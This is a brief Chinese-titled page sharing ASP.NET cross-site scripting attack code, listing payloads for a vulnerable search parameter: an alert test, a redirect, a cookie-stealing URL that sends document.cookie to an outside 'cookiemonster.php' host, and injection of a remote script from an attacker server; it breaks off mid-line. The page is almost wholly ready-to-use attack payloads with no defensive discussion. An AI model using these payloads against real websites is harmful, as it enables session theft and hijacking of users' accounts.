Asp.net跨站脚本攻击XSS实例分享
常用攻击代码:
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
Redirection Attack
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.xxx.com")>
Cookie stealing
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:e/**/xpression(window.location=
"http://www.xxx.com/cookiemonster.php?sid="%2bdocument.cookie)>
Unrestricted HTML injection from external '.js' file
http://target/vuln-search.aspx?term=
</XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild
(document.createElement("script")))>
</XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))>
where 'xss.js&